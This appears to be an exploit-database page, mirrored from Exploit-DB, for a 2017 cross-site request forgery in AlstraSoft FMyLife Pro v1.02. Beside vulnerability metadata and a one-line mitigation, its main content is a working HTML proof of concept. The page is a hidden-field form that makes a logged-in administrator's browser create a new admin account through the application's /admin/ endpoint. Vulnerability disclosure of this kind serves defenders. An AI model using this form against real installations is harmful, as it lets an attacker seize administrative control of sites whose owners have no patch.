header-logo
Suggest Exploit
vendor:
FMyLife Pro
by:
Ihsan Sencan
7,5
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: FMyLife Pro
Affected Version From: 1.02
Affected Version To: 1.02
Patch Exists: NO
Related CWE: N/A
CPE: a:alstrasoft:fmylife_pro:1.02
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

AlstraSoft FMyLife Pro v1.02 Script – Cross-Site Request Forgery (Add Admin)

This exploit allows an attacker to add an administrator to the AlstraSoft FMyLife Pro v1.02 Script by sending a malicious request to the vulnerable application. The malicious request contains a specially crafted form with hidden fields that can be used to add an administrator to the application.

Mitigation:

The application should validate all requests and verify that they are coming from a trusted source.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: AlstraSoft FMyLife Pro v1.02 Script - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/fmylife-pro.htm
# Demo: http://www.tellaboutit.com/
# Version: 1.02
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="submit" name="Sumbit" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #

Navigation

Suggest Exploit

Services By CQR